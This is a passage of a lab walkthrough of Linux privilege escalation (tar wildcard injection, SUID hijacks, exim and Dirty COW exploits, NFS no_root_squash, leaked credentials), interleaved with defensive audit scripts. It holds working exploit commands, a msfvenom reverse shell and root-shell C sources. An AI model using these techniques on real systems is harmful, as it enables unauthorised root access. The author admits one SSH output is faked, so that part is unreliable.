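audit_crontab "$CRONTAB_WEAK"            # two findings
audit_crontab "$CRONTAB_FIXED"           # nothing
script_group_or_other_writable "$TMP_SCRIPT" && echo "$TMP_SCRIPT: writable by group or other"
```

Fixing the PATH line alone is not enough: the relative overwrite.sh entry would still be resolved through whatever PATH cron is given, so both findings need the corrected crontab above.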


Task 10 – Cron Jobs – Wildcards

  • Let’s look at the other cron job script, compress.sh:
user@debian:~$ cat /usr/local/bin/compress.sh
#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

Notice the * (wildcard) at the end of the tar command?

Let’s take a look at GTFOBins page for tar: https://gtfobins.github.io/gtfobins/tar/

Tar has command line options that let you run other commands as part of a "checkpoint" feature.

  • Let's cook up a shell in msfvenom, then run nc to listen on the port we set:
❯ msfvenom -p linux/x64/shell_reverse_tcp LHOST=tun0 LPORT=1337 -f elf -o linl33t  
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: linl33t

❯ nc -lnvp 1337
  • Transfer it to /home/user (the "user" account's home directory) via scp:
❯ scp -oHostKeyAlgorithms=+ssh-rsa linl33t user@10.10.200.127:~
user@10.10.200.127's password: 
linl33t                                                  100%  194     0.6KB/s   00:00
  • On the target box, let's not forget to make it executable:
user@debian:~$ chmod +x linl33t 
user@debian:~$ 
  • Now we will create two files in /home/user whose names match the command-line switches tar expects, so that it runs linl33t (our msfvenom reverse shell):
touch /home/user/--checkpoint=1
touch /home/user/--checkpoint-action=exec=linl33t
  • … and magically, back on our attack box:
❯ nc -lnvp 1337
Connection from 10.10.200.127:34644
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64 GNU/Linux
hostname
debian
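
The root cause in Task 10 is that compress.sh lets the shell expand a bare * and tar then reads any file name starting with "-" as an option. The following is an added example, not part of the room, showing the hardened form of that backup command next to a check that lists option-looking names in a directory. It builds its own temporary directory, including one file named like the ones the task creates, so it runs offline; the directory layout and file names are constructed for the example.

```sh
# Added example, not part of the room: hardened counterpart of compress.sh
# plus a check for file names that a bare wildcard would turn into options.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir "$WORK/home"
echo data > "$WORK/home/notes.txt"
touch -- "$WORK/home/--checkpoint=1"          # constructed option-looking name

# Names in a directory that begin with "-" (hidden files included); each
# would be parsed as an option if passed to tar via an unquoted *.
option_like_names() {
    for f in "$1"/.* "$1"/*; do
        name=${f##*/}
        case $name in
            .|..) ;;
            -*) printf '%s\n' "$name" ;;
        esac
    done
    return 0
}

# Vulnerable form from the room, for comparison:   cd DIR; tar czf OUT *
# The shell expands * and tar receives "--checkpoint=1" as an argument.
#
# Hardened form: change into the directory and name "." as the only member,
# so nothing the directory contains is ever read as an option. Placing "--"
# before the operands achieves the same with GNU tar.
safe_backup() {
    tar czf "$2" -C "$1" .
}

# Members of an archive, one per line.
archive_members() {
    tar tzf "$1"
}

option_like_names "$WORK/home"                 # --checkpoint=1
safe_backup "$WORK/home" "$WORK/backup.tar.gz"
archive_members "$WORK/backup.tar.gz"          # ./, ./notes.txt, ./--checkpoint=1
```

The archive still contains the oddly named file, which is the point: it is data, not an instruction. The name check is useful as a periodic scan of directories that root-owned jobs read, since such names have no ordinary reason to exist there.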

Task 11 – SUID / SGID Executables – Known Exploits

  • Find all SUID / SGID executables:
user@debian:~$ find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null
-rwxr-sr-x 1 root shadow 19528 Feb 15  2011 /usr/bin/expiry
-rwxr-sr-x 1 root ssh 108600 Apr  2  2014 /usr/bin/ssh-agent
-rwsr-xr-x 1 root root 37552 Feb 15  2011 /usr/bin/chsh
-rwsr-xr-x 2 root root 168136 Jan  5  2016 /usr/bin/sudo
-rwxr-sr-x 1 root tty 11000 Jun 17  2010 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 35040 Dec 18  2010 /usr/bin/crontab
-rwsr-xr-x 1 root root 32808 Feb 15  2011 /usr/bin/newgrp
-rwsr-xr-x 2 root root 168136 Jan  5  2016 /usr/bin/sudoedit
-rwxr-sr-x 1 root shadow 56976 Feb 15  2011 /usr/bin/chage
-rwsr-xr-x 1 root root 43280 Feb 15  2011 /usr/bin/passwd
-rwsr-xr-x 1 root root 60208 Feb 15  2011 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 39856 Feb 15  2011 /usr/bin/chfn
-rwxr-sr-x 1 root tty 12000 Jan 25  2011 /usr/bin/wall
-rwsr-sr-x 1 root staff 9861 May 14  2017 /usr/local/bin/suid-so
-rwsr-sr-x 1 root staff 6883 May 14  2017 /usr/local/bin/suid-env
-rwsr-sr-x 1 root staff 6899 May 14  2017 /usr/local/bin/suid-env2
-rwsr-xr-x 1 root root 963691 May 13  2017 /usr/sbin/exim-4.84-3
-rwsr-xr-x 1 root root 6776 Dec 19  2010 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 212128 Apr  2  2014 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10592 Feb 15  2016 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 36640 Oct 14  2010 /bin/ping6
-rwsr-xr-x 1 root root 34248 Oct 14  2010 /bin/ping
-rwsr-xr-x 1 root root 78616 Jan 25  2011 /bin/mount
-rwsr-xr-x 1 root root 34024 Feb 15  2011 /bin/su
-rwsr-xr-x 1 root root 53648 Jan 25  2011 /bin/umount
-rwsr-sr-x 1 root root 926536 Nov 24 03:55 /tmp/rootbash
-rwxr-sr-x 1 root shadow 31864 Oct 17  2011 /sbin/unix_chkpwd
-rwsr-xr-x 1 root root 94992 Dec 13  2014 /sbin/mount.nfs

/usr/sbin/exim-4.84-3 is in the above list – this version is exploitable! A local privilege escalation exploit to be exact! (included in /home/user/tools/suid/exim/ named cve-2016-1531.sh).

  • Let's exploit it! 😉
user@debian:~$ /home/user/tools/suid/exim/cve-2016-1531.sh
[ CVE-2016-1531 local root exploit
sh-4.1# /bin/bash
root@debian:~# id
uid=0(root) gid=1000(user) groups=0(root)
root@debian:~# 

Task 12 – SUID / SGID Executables – Shared Object Injection

From the previous search, we also have /usr/local/bin/suid-so – this is vulnerable to a shared object injection.

  • First, execute the file and note that currently it displays a progress bar before exiting:
user@debian:~$ suid-so
Calculating something, please wait...
[=====================================================================>] 99 %
Done.
user@debian:~$ 
  • Run strace on the file and search the output for open/access calls, and for "no such file" errors:
user@debian:~$ strace /usr/local/bin/suid-so 2>&1 | grep -iE "open|access|no such file"
access("/etc/suid-debug", F_OK)         = -1 ENOENT (No such file or directory)
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK)      = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libdl.so.2", O_RDONLY)       = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/usr/lib/libstdc++.so.6", O_RDONLY) = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libm.so.6", O_RDONLY)        = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libgcc_s.so.1", O_RDONLY)    = 3
access("/etc/ld.so.nohwcap", F_OK)      = -1 ENOENT (No such file or directory)
open("/lib/libc.so.6", O_RDONLY)        = 3
open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory)

Looking at the bottom line – it looks like suid-so looks for a file named libcalc.so in /home/user/.config/ (our home directory!)

  • Using the example shared object code in /home/user/tools/suid/ named libcalc.c (which simply calls a Bash shell), let's compile the code into a shared object at the location we found from suid-so above, and see what happens when we run suid-so now:
user@debian:~$ mkdir .config
user@debian:~$ gcc -shared -fPIC -o /home/user/.config/libcalc.so /home/user/tools/suid/libcalc.c
user@debian:~$ suid-so
Calculating something, please wait...
bash-4.1# id
uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

SOURCE >> libcalc.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Marked as a constructor so it runs as soon as suid-so loads the object */
static void inject() __attribute__((constructor));

void inject() {
    setuid(0);                 /* the SUID binary's effective UID is already root */
    system("/bin/bash -p");
}

Task 13 – SUID / SGID Executables – Environment Variables

Still looking at the SUID/SGID binaries list we got from Task 11, we have another exploitable binary, /usr/local/bin/suid-env – this inherits the user's PATH environment variable and attempts to execute programs without a full path – this one is ripe for the picking!

  • First, let's run it and see what it is trying to do:
user@debian:~/tools/sudo$ suid-env
[....] Starting web server: apache2httpd (pid 1680) already running
. ok 
  • OK… let's dig a bit deeper using strings:
user@debian:~/tools/sudo$ strings /usr/local/bin/suid-env
/lib64/ld-linux-x86-64.so.2
5q;Xq
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
service apache2 start
  • The last line – service apache2 start – does not point to the full path of service (/usr/sbin/service) – let's compile some code from our home directory that simply spawns a Bash shell, ironically (or not) called service.c… do you see where this is going yet? 🙂
user@debian:~$ gcc -o service /home/user/tools/suid/service.c
user@debian:~$ 
  • OK – now it’s showtime! 🙂
user@debian:~$ PATH=.:$PATH /usr/local/bin/suid-env
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

SOURCE >> service.c

#include <stdlib.h>
#include <unistd.h>

/* Found via PATH in place of /usr/sbin/service and run by the SUID binary */
int main() {
    setuid(0);
    system("/bin/bash -p");
    return 0;
}

Task 14 – SUID / SGID Executables – Abusing Shell Features (#1)

NOTE: This will not work on Bash versions above 4.2-048.

  • While still looking at the SUID/SGID binaries list from Task 11, we also see /usr/local/bin/suid-env2 – this executable is identical to suid-env except that it uses the absolute path of the service binary:
user@debian:~$ strings /usr/local/bin/suid-env2
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setresgid
setresuid
system
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0H
/usr/sbin/service apache2 start

In Bash versions below 4.2-048 it is possible to define shell functions with names that resemble file paths, then export those functions so that they are used instead of any actual executable at that file path.

  • Let’s check our Bash version:
user@debian:~$ /bin/bash --version
GNU bash, version 4.1.5(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
user@debian:~$ 
  • Yippee! Let's create a bash function named "/usr/sbin/service" that starts a new Bash shell (using -p to preserve the root permissions), export the function, then run suid-env2 again and voilà! 😉
user@debian:~$ function /usr/sbin/service { /bin/bash -p; }
user@debian:~$ export -f /usr/sbin/service
user@debian:~$ suid-env2
root@debian:~# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

Task 15 – SUID / SGID Executables – Abusing Shell Features (#2)

NOTE: This will not work on Bash versions 4.4 and above.

When in debugging mode, Bash uses the environment variable PS4 to display an extra prompt for debugging statements.

  • Run the /usr/local/bin/suid-env2 executable with Bash debugging enabled, and the PS4 variable set to an embedded command that will create an SUID version of /bin/bash:
user@debian:~$ env -i SHELLOPTS=xtrace PS4='$(cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash)' /usr/local/bin/suid-env2
/usr/sbin/service apache2 start
basename /usr/sbin/service
VERSION='service ver. 0.91-ubuntu1'
basename /usr/sbin/service
USAGE='Usage: service < option > | --status-all | [ service_name [ command | --full-restart ] ]'
SERVICE=
ACTION=
SERVICEDIR=/etc/init.d
OPTIONS=
'[' 2 -eq 0 ']'
cd /
'[' 2 -gt 0 ']'
case "${1}" in
'[' -z '' -a 2 -eq 1 -a apache2 = --status-all ']'
'[' 2 -eq 2 -a start = --full-restart ']'
'[' -z '' ']'
SERVICE=apache2
shift
'[' 1 -gt 0 ']'
case "${1}" in
'[' -z apache2 -a 1 -eq 1 -a start = --status-all ']'
'[' 1 -eq 2 -a '' = --full-restart ']'
'[' -z apache2 ']'
'[' -z '' ']'
ACTION=start
shift
'[' 0 -gt 0 ']'
'[' -r /etc/init/apache2.conf ']'
'[' -x /etc/init.d/apache2 ']'
exec env -i LANG= PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin TERM=dumb /etc/init.d/apache2 start
Starting web server: apache2httpd (pid 1680) already running
.
user@debian:~$ ls -al /tmp/rootbash
-rwsr-sr-x 1 root root 926536 Nov 24 05:03 /tmp/rootbash
  • Then as before, it’s as simple as running this, and we are root!
user@debian:~$ /tmp/rootbash -p
rootbash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
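
Every finding in Tasks 11 to 15 appears in the Task 11 inventory before any of it is exploited: the three suid-* binaries and the old exim are not part of the distribution's set-id set, and /tmp/rootbash sits in a world-writable directory. The following is an added example, not part of the room, that compares a set-id inventory against a baseline and flags set-id files in untrusted locations. The current list is constructed from the room's find output (shortened) and the baseline is an assumption standing in for one captured at build time; list_suid_now wraps the room's own search for live use.

```sh
# Added example, not part of the room: baseline comparison for SUID/SGID
# inventories, plus a location check for set-id files under user-writable
# or user-owned directories.

# The room's own search, wrapped (paths only).
list_suid_now() {
    find / -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null
}

# Constructed current inventory (subset of the Task 11 output).
CURRENT='/usr/bin/chsh
/usr/bin/sudo
/usr/bin/passwd
/usr/local/bin/suid-so
/usr/local/bin/suid-env
/usr/local/bin/suid-env2
/usr/sbin/exim-4.84-3
/bin/ping
/bin/mount
/bin/su
/tmp/rootbash'

# Constructed baseline: the distribution's own set, recorded before deployment.
BASELINE='/usr/bin/chsh
/usr/bin/sudo
/usr/bin/passwd
/bin/ping
/bin/mount
/bin/su'

# Entries in the current list that the baseline does not contain.
suid_not_in_baseline() {
    printf '%s\n' "$1" | awk -v base="$2" '
        BEGIN { n = split(base, b, "\n"); for (i = 1; i <= n; i++) seen[b[i]] = 1 }
        !($0 in seen)'
}

# Entries under directories any local user can write to or that hold user data.
suid_in_untrusted_dirs() {
    printf '%s\n' "$1" | while IFS= read -r p; do
        case $p in
            /tmp/*|/var/tmp/*|/dev/shm/*|/home/*) printf '%s\n' "$p" ;;
        esac
    done
    return 0
}

audit_suid() {
    for p in $(suid_not_in_baseline "$1" "$2"); do
        echo "not in baseline: $p (verify origin; consider chmod u-s,g-s)"
    done
    for p in $(suid_in_untrusted_dirs "$1"); do
        echo "set-id file in untrusted location: $p (remove)"
    done
    return 0
}

audit_suid "$CURRENT" "$BASELINE"   # 5 baseline findings + 1 location finding
```

A set-id copy of bash in /tmp is also the artefact that Tasks 2, 9 and 15 leave behind, so the location check doubles as a post-compromise indicator; mounting /tmp with nosuid removes the technique altogether.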

Task 16 – Passwords & Keys – History Files

If a user accidentally types their password on the command line instead of into a password prompt, it may get recorded in a "history file". Bash, for example, saves your command history in ~/.bash_history.

  • Let’s see if the owner of this box left behind any clues…:
user@debian:~$ cat ~/.*history
ls -al
cat .bash_history 
ls -al
mysql -h somehost.local -uroot -ppassword123
exit
cd /tmp
clear
ifconfig
netstat -antp
nano myvpn.ovpn 
  • Looking at the above output, we can see they tried to access MySQL via the command line, password and all! … worse still, they have reused that password on the actual root account!
user@debian:~$ su root
Password: password123
root@debian:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@debian:/home/user# 


Task 17 – Passwords & Keys – Config Files

Config files can be a treasure-trove of information – even passwords!

  • Note below, the user has a file named myvpn.ovpn – let’s have a look:
user@debian:~$ ls
myvpn.ovpn  tools
user@debian:~$ cat myvpn.ovpn 
client
dev tun
proto udp
remote 10.10.10.10 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
tls-client
remote-cert-tls server
auth-user-pass /etc/openvpn/auth.txt
comp-lzo
verb 1
reneg-sec 0
  • There is a line in this file starting with auth-user-pass that points to a text file…
user@debian:~$ cat /etc/openvpn/auth.txt
root
password123

Hello there! root login details! 😉



Task 18 – Passwords & Keys – SSH Keys

Sometimes users make backups of important files, but fail to secure them with the correct permissions…

  • Let’s check / for any hidden files or folders:
user@debian:~$ ls -la /
total 96
drwxr-xr-x 22 root root  4096 Aug 25  2019 .
drwxr-xr-x 22 root root  4096 Aug 25  2019 ..
drwxr-xr-x  2 root root  4096 Aug 25  2019 bin
drwxr-xr-x  3 root root  4096 May 12  2017 boot
drwxr-xr-x 12 root root  2820 Nov 24 02:59 dev
drwxr-xr-x 67 root root  4096 Nov 24 05:20 etc
drwxr-xr-x  3 root root  4096 May 15  2017 home
lrwxrwxrwx  1 root root    30 May 12  2017 initrd.img -> boot/initrd.img-2.6.32-5-amd64
drwxr-xr-x 12 root root 12288 May 14  2017 lib
lrwxrwxrwx  1 root root     4 May 12  2017 lib64 -> /lib
drwx------  2 root root 16384 May 12  2017 lost+found
drwxr-xr-x  3 root root  4096 May 12  2017 media
drwxr-xr-x  2 root root  4096 Jun 11  2014 mnt
drwxr-xr-x  2 root root  4096 May 12  2017 opt
dr-xr-xr-x 96 root root     0 Nov 24 02:57 proc
drwx------  5 root root  4096 May 15  2020 root
drwxr-xr-x  2 root root  4096 May 13  2017 sbin
drwxr-xr-x  2 root root  4096 Jul 21  2010 selinux
drwxr-xr-x  2 root root  4096 May 12  2017 srv
drwxr-xr-x  2 root root  4096 Aug 25  2019 .ssh
drwxr-xr-x 13 root root     0 Nov 24 02:57 sys
drwxrwxrwt  2 root root  4096 Nov 24 05:30 tmp
drwxr-xr-x 11 root root  4096 May 13  2017 usr
drwxr-xr-x 14 root root  4096 May 13  2017 var
lrwxrwxrwx  1 root root    27 May 12  2017 vmlinuz -> boot/vmlinuz-2.6.32-5-amd64
  • Notice the .ssh folder? Let’s investigate that one further…
user@debian:~$ ls -al /.ssh
total 12
drwxr-xr-x  2 root root 4096 Aug 25  2019 .
drwxr-xr-x 22 root root 4096 Aug 25  2019 ..
-rw-r--r--  1 root root 1679 Aug 25  2019 root_key
  • A world-readable file named root_key – it’s a PRIVATE KEY:
user@debian:~$ cat /.ssh/root_key
-----BEGIN RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
  • Let’s dump this into a file locally, and see if it lets us connect!
❯ v root_key
❯ chmod 600 root_key
❯ ssh -i root_key root@10.10.200.127
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 25 14:02:49 2019 from 192.168.1.2
root@debian:~# 

NOTE: This didn’t actually work on my box when trying to connect to this box… I have also had issues with Host Key Algorithms and have to force SSH connections to this box with -oHostKeyAlgorithms=+ssh-rsa to connect… the above output is unfortunately faked. 🙁
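The three finds above (a password left in ~/.bash_history, an auth-user-pass file named by a .ovpn config, and a world-readable private key) are exactly what a periodic hardening check should catch first. The following Python is an added example, not part of the room or this writeup: history_hits, ovpn_auth_files and exposed_secret_files are names chosen here, the history lines and .ovpn text are constructed to mirror the output above, and the pattern list is deliberately small.

```python
import os
import re
import stat

# Inline-password forms worth flagging in shell history (constructed, not exhaustive):
# mysql -pSECRET, anything --password=SECRET, sshpass -p SECRET. 'secret' is what gets redacted.
HISTORY_PATTERNS = [
    re.compile(r"\b(?P<tool>mysql|mysqldump|mysqladmin)\b.*\s-p(?P<secret>\S+)"),
    re.compile(r"\b(?P<tool>\w+)\b.*--password=(?P<secret>\S+)"),
    re.compile(r"\b(?P<tool>sshpass)\s+-p\s+(?P<secret>\S+)"),
]

def history_hits(lines):
    """Return (line_no, tool, redacted_line) for history entries carrying a password.
    The secret is cut out before anything is returned, so the report itself leaks nothing."""
    hits = []
    for n, line in enumerate(lines, start=1):
        for pat in HISTORY_PATTERNS:
            m = pat.search(line)
            if m:
                redacted = line[:m.start("secret")] + "<redacted>" + line[m.end("secret"):]
                hits.append((n, m.group("tool"), redacted))
                break
    return hits

def ovpn_auth_files(ovpn_text):
    """Paths named by auth-user-pass directives; a bare auth-user-pass prompts and names no file."""
    return re.findall(r"^[ \t]*auth-user-pass[ \t]+(\S+)", ovpn_text, re.MULTILINE)

def mode_is_exposed(mode):
    """True when group or others can read: wrong for a password file or a private key."""
    return bool(mode & (stat.S_IRGRP | stat.S_IROTH))

def exposed_secret_files(paths):
    """Of the given candidates, those that exist and are readable beyond their owner."""
    return [p for p in paths if os.path.isfile(p) and mode_is_exposed(os.stat(p).st_mode)]

if __name__ == "__main__":
    # Constructed history and .ovpn text modelled on the output above.
    history = ["ls -al", "mysql -h somehost.local -uroot -ppassword123",
               "mysql -u root -p", "nano myvpn.ovpn"]
    for n, tool, line in history_hits(history):
        print(f"history line {n}: {tool} password given on the command line: {line}")
    ovpn = "client\ndev tun\nauth-user-pass /etc/openvpn/auth.txt\nverb 1\n"
    candidates = ovpn_auth_files(ovpn) + ["/.ssh/root_key", os.path.expanduser("~/.ssh/id_rsa")]
    for p in exposed_secret_files(candidates):
        print(f"{p}: readable by group/other, expected mode 0600")
```

Note that `mysql -u root -p` (password typed at the prompt) is deliberately not flagged, only the form with the password glued onto -p.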


Task 19 – NFS

Files created via NFS inherit the remote user’s ID. If the user is root, and root squashing is enabled, the ID will instead be set to the "nobody" user.

  • Check the NFS share configuration on the target:
user@debian:~$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
#       to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#

/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)

#/tmp *(rw,sync,insecure,no_subtree_check)
  • Notice how the only active (uncommented) line has no_root_squash set as an option? This gives us a window to remotely create a backdoor (on the attacking machine)! 😉
❯ sudo mkdir tmp
❯ sudo mount -o rw,vers=2 10.10.200.127:/tmp /home/stimpz/tryhackme/linux_privesc/tmp
❯ cd tmp
❯ ls
backup.tar.gz  rootbash  root.pm  useless
❯ sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o shell    
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 48 bytes
Final size of elf file: 132 bytes
Saved as: shell
❯ sudo chmod +xs shell
❯ ls -al
total 1028
drwxrwxrwt 2 root   root     4096 Nov 24 22:15 .
drwxr-xr-x 1 stimpz stimpz     88 Nov 24 22:10 ..
-rw-r--r-- 1 root   root    94900 Nov 24 22:15 backup.tar.gz
-rwsr-sr-x 1 root   root   926536 Nov 24 22:15 rootbash
-rw-r--r-- 1 stimpz stimpz     60 Nov 24 20:04 root.pm
-rwsr-sr-x 1 root   root      132 Nov 24 22:14 shell
-rw-r--r-- 1 root   root       29 Nov 24 19:09 useless
  • Now let’s try running that file on the target:
user@debian:~$ /tmp/shell
bash-4.1# id
uid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)
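An exports(5) parser that flags the option the author points at, as an added example (not the room's or this writeup's code): parse_exports, risky_exports and hardened_options are names chosen here, and the sample text is a constructed copy of the /etc/exports shown above, commented-out line included so the comment handling is exercised.

```python
import re

# Options that undo two NFS defaults: root_squash (remote uid 0 becomes nobody) and
# secure (requests must come from a privileged port). Descriptions are ours, see exports(5).
RISKY = {
    "no_root_squash": "remote root keeps uid 0, so files it writes here stay root-owned",
    "insecure": "requests accepted from unprivileged ports, so any client user can speak NFS",
}
HARDENED = {"no_root_squash": "root_squash", "insecure": "secure"}

def parse_exports(text):
    """(path, client, options) for each export in exports(5) text. '#' comments and blank
    lines are skipped; a client without '(...)' gets default options; a path with no client
    is recorded as client '*'. Dash-prefixed default option lists are not handled."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        for spec in parts[1:] or ["*"]:
            m = re.fullmatch(r"([^(]*)(?:\((.*)\))?", spec)
            if m:
                opts = [o for o in (m.group(2) or "").split(",") if o]
                entries.append((parts[0], m.group(1) or "*", opts))
    return entries

def risky_exports(text):
    """Findings for exports on which a remote root can plant files that stay root-owned."""
    findings = []
    for path, client, opts in parse_exports(text):
        access = "rw" if "rw" in opts else "ro"
        findings += [f"{path} {client} ({access}): {o}: {RISKY[o]}" for o in opts if o in RISKY]
    return findings

def hardened_options(opts):
    """The same option list with each risky flag replaced by its secure default."""
    return [HARDENED.get(o, o) for o in opts]

if __name__ == "__main__":
    # Constructed copy of the /etc/exports shown above, commented-out line included.
    sample = ("# /etc/exports: the access control list for filesystems which may be exported\n"
              "/tmp *(rw,sync,insecure,no_root_squash,no_subtree_check)\n\n"
              "#/tmp *(rw,sync,insecure,no_subtree_check)\n")
    for finding in risky_exports(sample):
        print("FINDING:", finding)
    for path, client, opts in parse_exports(sample):
        print(f"suggested: {path} {client}({','.join(hardened_options(opts))})")
```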


Task 20 – Kernel Exploits

Kernel exploits can leave a system in an unstable state, which is why you should only run them as a last resort.

  • Run the Linux Exploit Suggester 2 tool to identify potential kernel exploits on the current system:
user@debian:~$ perl /home/user/tools/kernel-exploits/linux-exploit-suggester-2/linux-exploit-suggester-2.pl

  #############################
    Linux Exploit Suggester 2
  #############################

  Local Kernel: 2.6.32
  Searching 72 exploits...

  Possible Exploits
  [1] american-sign-language
      CVE-2010-4347
      Source: http://www.securityfocus.com/bid/45408
  [2] can_bcm
      CVE-2010-2959
      Source: http://www.exploit-db.com/exploits/14814
  [3] dirty_cow
      CVE-2016-5195
      Source: http://www.exploit-db.com/exploits/40616
  [4] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [5] half_nelson1
      Alt: econet       CVE-2010-3848
      Source: http://www.exploit-db.com/exploits/17787
  [6] half_nelson2
      Alt: econet       CVE-2010-3850
      Source: http://www.exploit-db.com/exploits/17787
  [7] half_nelson3
      Alt: econet       CVE-2010-4073
      Source: http://www.exploit-db.com/exploits/17787
  [8] msr
      CVE-2013-0268
      Source: http://www.exploit-db.com/exploits/27297
  [9] pktcdvd
      CVE-2010-3437
      Source: http://www.exploit-db.com/exploits/15150
  [10] ptrace_kmod2
      Alt: ia32syscall,robert_you_suck       CVE-2010-3301
      Source: http://www.exploit-db.com/exploits/15023
  [11] rawmodePTY
      CVE-2014-0196
      Source: http://packetstormsecurity.com/files/download/126603/cve-2014-0196-md.c
  [12] rds
      CVE-2010-3904
      Source: http://www.exploit-db.com/exploits/15285
  [13] reiserfs
      CVE-2010-1146
      Source: http://www.exploit-db.com/exploits/12130
  [14] video4linux
      CVE-2010-3081
      Source: http://www.exploit-db.com/exploits/15024

One of the most popular kernel exploits, known as "Dirty C0W", is listed at number 3 – the source code for this exploit is available at /home/user/tools/kernel-exploits/dirtycow/ and it is named c0w.c. This exploit uses the kernel vulnerability to overwrite the SUID binary /usr/bin/passwd with one that spawns a root shell.

  • Compile the code and run it (note that it might take several minutes to complete):
user@debian:~$ gcc -pthread /home/user/tools/kernel-exploits/dirtycow/c0w.c -o c0w
user@debian:~$ ./c0w

   (___)                                   
   (o o)_____/                             
    @@ `     \                            
     \ ____, //usr/bin/passwd                          
     //    //                              
    ^^    ^^                               
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
mmap 74d5f000

madvise 0

ptrace 0
  • Once the exploit has finished running, simply run /usr/bin/passwd and it will drop you into a root shell:
user@debian:~$ /usr/bin/passwd
root@debian:/home/user# id
uid=0(root) gid=1000(user) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)

Task 21 – Privilege Escalation Scripts

This task was purely running tools such as linPEAS, Linux Smart Enumeration and linEnum to see if the exploits above showed up… without attaching some SUPER LONG output from some of these above tools, let’s just say overall the three of them covered pretty much everything AND MORE. This is one of the core reasons that one of my personal first moves when getting onto a box is to run at least one of these and go from there. 😉

  • linPEAS – The most popular and advanced Linux privilege escalation scanner on the market!
  • Linux Smart Enumeration – A very thorough and detailed PrivEsc method scanner; you can control how much detail it outputs!
  • linEnum – The original Linux PrivEsc checker, although now deprecated by the above two (and abandoned as of 2 years ago).
